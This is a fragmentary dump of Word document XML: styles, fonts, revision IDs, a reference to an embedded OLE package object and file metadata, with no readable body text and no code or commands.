        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:42.75pt;width:72pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId13" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1468075725" r:id="rId12">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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DotumChe">
    <w:panose1 w:val="020B0609000101010101"/>
    <w:charset w:val="81"/>
    <w:family w:val="moder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9541" w:yAlign="top"/>
      <w:rPr>
        <w:rStyle w:val="8"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="8"/>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>Page</w:t>
    </w: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5"/>
      <w:ind w:right="360"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>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distribute"/>
      <w:rPr>
        <w:rFonts w:eastAsia="华文仿宋"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:cs="宋体"/>
        <w:color w:val="000000"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:posOffset>-46990</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>278130</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="5387975" cy="52070"/>
          <wp:effectExtent l="19050" t="0" r="3175"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rcRect/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="5387975" cy="52070"/>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6E4C7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6DA6E4C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E17114"/>
    <w:rsid w:val="00092939"/>
    <w:rsid w:val="00126145"/>
    <w:rsid w:val="001767E6"/>
    <w:rsid w:val="00190A8D"/>
    <w:rsid w:val="001B21A1"/>
    <w:rsid w:val="002333B7"/>
    <w:rsid w:val="00244D42"/>
    <w:rsid w:val="002D35FA"/>
    <w:rsid w:val="00312C1A"/>
    <w:rsid w:val="00312DD1"/>
    <w:rsid w:val="0033176D"/>
    <w:rsid w:val="003504B5"/>
    <w:rsid w:val="003A2A06"/>
    <w:rsid w:val="003F58F6"/>
    <w:rsid w:val="00413229"/>
    <w:rsid w:val="00427917"/>
    <w:rsid w:val="0046088D"/>
    <w:rsid w:val="0048006F"/>
    <w:rsid w:val="004C63EE"/>
    <w:rsid w:val="004C7BFA"/>
    <w:rsid w:val="004D79CC"/>
    <w:rsid w:val="0051029C"/>
    <w:rsid w:val="005D680C"/>
    <w:rsid w:val="005F56A6"/>
    <w:rsid w:val="00620346"/>
    <w:rsid w:val="00690BB8"/>
    <w:rsid w:val="006C60A2"/>
    <w:rsid w:val="006D7CA8"/>
    <w:rsid w:val="00763814"/>
    <w:rsid w:val="00771468"/>
    <w:rsid w:val="00793203"/>
    <w:rsid w:val="00796A2A"/>
    <w:rsid w:val="007A2A69"/>
    <w:rsid w:val="007C2C21"/>
    <w:rsid w:val="007C33E4"/>
    <w:rsid w:val="007E771D"/>
    <w:rsid w:val="00872250"/>
    <w:rsid w:val="0096003B"/>
    <w:rsid w:val="00971DDC"/>
    <w:rsid w:val="00992DCD"/>
    <w:rsid w:val="009D6233"/>
    <w:rsid w:val="009E748B"/>
    <w:rsid w:val="00A22250"/>
    <w:rsid w:val="00A95088"/>
    <w:rsid w:val="00AC4276"/>
    <w:rsid w:val="00AE7865"/>
    <w:rsid w:val="00B12666"/>
    <w:rsid w:val="00C50168"/>
    <w:rsid w:val="00D85273"/>
    <w:rsid w:val="00DA12AB"/>
    <w:rsid w:val="00E153F6"/>
    <w:rsid w:val="00E26FED"/>
    <w:rsid w:val="00E43842"/>
    <w:rsid w:val="00E943EE"/>
    <w:rsid w:val="00F01A21"/>
    <w:rsid w:val="00F204EA"/>
    <w:rsid w:val="00FF0AAD"/>
    <w:rsid w:val="09080CDA"/>
    <w:rsid w:val="0CDE1561"/>
    <w:rsid w:val="119B1FF4"/>
    <w:rsid w:val="14E17114"/>
    <w:rsid w:val="1D1A70DA"/>
    <w:rsid w:val="248E698C"/>
    <w:rsid w:val="2671307F"/>
    <w:rsid w:val="2805170C"/>
    <w:rsid w:val="2DD21AFC"/>
    <w:rsid w:val="2EEA5313"/>
    <w:rsid w:val="30605155"/>
    <w:rsid w:val="3729557C"/>
    <w:rsid w:val="3E0D162E"/>
    <w:rsid w:val="44C70D28"/>
    <w:rsid w:val="4BAD5B9B"/>
    <w:rsid w:val="4C261319"/>
    <w:rsid w:val="5363569C"/>
    <w:rsid w:val="540A5C7D"/>
    <w:rsid w:val="5519198B"/>
    <w:rsid w:val="6860094C"/>
    <w:rsid w:val="69797C2C"/>
    <w:rsid w:val="6E074CDD"/>
    <w:rsid w:val="74E35B52"/>
    <w:rsid w:val="759B6420"/>
    <w:rsid w:val="76F02AF0"/>
    <w:rsid w:val="77C46BC5"/>
    <w:rsid w:val="7D9E2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name="header"/>
    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0"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0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">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semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="命令行"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:top w:val="dotted" w:color="auto" w:sz="4" w:space="0"/>
        <w:left w:val="dotted" w:color="auto" w:sz="4" w:space="0"/>
        <w:bottom w:val="dotted" w:color="auto" w:sz="4" w:space="0"/>
        <w:right w:val="dotted" w:color="auto" w:sz="4" w:space="0"/>
      </w:pBdr>
      <w:wordWrap w:val="0"/>
      <w:spacing w:line="300" w:lineRule="atLeast"/>
      <w:ind w:left="1247"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DotumChe" w:hAnsi="DotumChe" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="Default Paragraph Font 2"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="page number 2"/>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emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><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zte</Company>
  <Pages>1</Pages>
  <Words>0</Words>
  <Characters>0</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>845</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2020-10-22T09:07:00Z</dcterms:created>
  <dc:creator>10206171</dc:creator>
  <cp:lastModifiedBy>10206171</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-28T02:39:01Z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